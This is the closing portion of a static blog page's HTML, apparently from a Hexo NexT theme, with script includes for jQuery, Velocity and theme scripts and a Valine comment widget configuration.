  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/src/utils.js?v=6.7.0"></script>

  <script src="/js/src/motion.js?v=6.7.0"></script>



  
  


  <script src="/js/src/affix.js?v=6.7.0"></script>

  <script src="/js/src/schemes/pisces.js?v=6.7.0"></script>




  
  <script src="/js/src/scrollspy.js?v=6.7.0"></script>
<script src="/js/src/post-details.js?v=6.7.0"></script>



  


  <script src="/js/src/bootstrap.js?v=6.7.0"></script>



  
  




  

<script src="//cdn1.lncld.net/static/js/3.11.1/av-min.js"></script>



<script src="//unpkg.com/valine/dist/Valine.min.js"></script>

<script>
  var GUEST = ['nick', 'mail', 'link'];
  var guest = 'nick,mail,link';
  guest = guest.split(',').filter(function (item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#comments',
    verify: false,
    notify: false,
    appId: '3awIpSk2hfHaeA1glDs5NtYG-gzGzoHsz',
    appKey: '6ORiR0zVaYi0ljkwUfSn0aWG',
    placeholder: 'Just go go',
    avatar: 'mm',
    meta: guest,
    pageSize: '10' || 10,
    visitor: false
  });
</script>



  





  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
